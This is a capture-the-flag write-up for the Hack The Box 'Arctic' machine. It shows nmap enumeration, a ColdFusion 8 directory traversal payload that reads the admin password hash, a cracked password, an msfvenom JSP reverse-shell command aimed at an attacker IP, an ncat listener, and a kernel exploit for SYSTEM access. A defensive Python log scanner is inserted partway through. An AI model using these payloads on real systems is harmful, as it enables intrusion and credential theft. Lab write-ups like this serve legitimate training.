root💀n16hth4wk-sec:~#

Hack Enumerate Harder!. Eat. Sleep. Repeat.


First enumeration with nmap.

# Nmap 7.93 scan initiated Thu May 18 21:37:02 2023 as: nmap -sC -sV -T4 -oN normal.txt -p 135,8500,49154 -Pn 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.18s latency).

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 18 21:39:25 2023 -- 1 IP address (1 host up) scanned in 143.20 seconds

image

Noticed a web server running on port 8500; opening it in a browser, we got to see two dirs.

image

Navigating to the first dir, we got to see some hidden dirs. Let’s check out the administrator dir.

image

We can see the administrator page is running an Adobe ColdFusion 8 service. Let’s check for exploits.

image

With a little research, found out that it is vulnerable to a directory traversal attack. exploit.

image

Using the payload /enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en we’re able to read the password hash of this service. Let’s crack this hash.
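A defender-side counterpart to the payload above, added here and not part of the original write-up: a small Python checker that flags requests whose locale parameter carries traversal segments or a null byte, run over constructed sample access-log lines (the log format and request paths are assumptions).

```python
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the original write-up).
SAMPLE_LOG = [
    '10.10.14.14 - - [18/May/2023:21:40:01] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 5120',
    '10.10.14.14 - - [18/May/2023:21:41:12] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 912',
    '10.10.14.14 - - [18/May/2023:21:41:30] "GET /CFIDE/administrator/enter.cfm?locale=..%2f..%2f..%2fColdFusion8%2flib%2fpassword.properties%00en HTTP/1.1" 200 912',
    '10.10.14.14 - - [18/May/2023:21:42:05] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 3300',
]


def extract_request_path(log_line):
    """Pull the request target (path plus query) out of a combined-format log line."""
    start = log_line.find('"') + 1
    end = log_line.find('"', start)
    request = log_line[start:end]          # e.g. GET /path?x=y HTTP/1.1
    parts = request.split()
    return parts[1] if len(parts) >= 2 else ""


def is_traversal_attempt(request_path):
    """True when a 'locale' parameter contains '../' (either slash style) or a NUL byte."""
    query = urlsplit(request_path).query
    # parse_qs already percent-decodes once; decode again to catch double-encoded input.
    for value in parse_qs(query, keep_blank_values=True).get("locale", []):
        decoded = unquote(value)
        normalized = decoded.replace("\\", "/")
        if "../" in normalized or "\x00" in decoded:
            return True
    return False


def scan_log(lines):
    """Return the request paths from the log that look like traversal attempts."""
    flagged = []
    for line in lines:
        path = extract_request_path(line)
        if is_traversal_attempt(path):
            flagged.append(path)
    return flagged


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("traversal attempt:", hit)
```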

image

Using an online hash cracker, we are able to crack the hash. happyday. Let’s log in using this password.

image

Cool, we’re in the administrator panel. Let’s play around and find a way to get a shell.

image

Navigate to the task schedule button and click the schedule new task button.

┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/HTB/Artic]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.14 LPORT=445 -f raw -o shell.jsp
Payload size: 1496 bytes
Saved as: shell.jsp

First we generate a JSP reverse shell.

image

Add a new task and set up a Python listener, so the task will download the shell and save it to the dir C:\ColdFusion8\wwwroot\CFIDE\shell.jsp. Click on submit.

image

Fire up an ncat listener and hit the run button.

image

Now let’s navigate to the uploaded payload so it will trigger a reverse shell.

┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/HTB/Artic]
└─$ ncat -lnvp 445                                                                 
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::445
Ncat: Listening on 0.0.0.0:445
Ncat: Connection from 10.10.10.11.
Ncat: Connection from 10.10.10.11:49589.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis

C:\ColdFusion8\runtime\bin>

Check back on the ncat listener and boom, we got a reverse shell as arctic\tolis.

Privilege Escalation

image

First check systeminfo, copy the output of systeminfo into a file and save it.

image

Ran windows-exploit-suggester (found here). We can see so many kernel exploits we can use. Let’s use MS10-059, which you can find in windows-exploit.

image

Download the exe file and send it to the target.

image

Ran the exploit and boom, got a reverse shell as nt authority\system.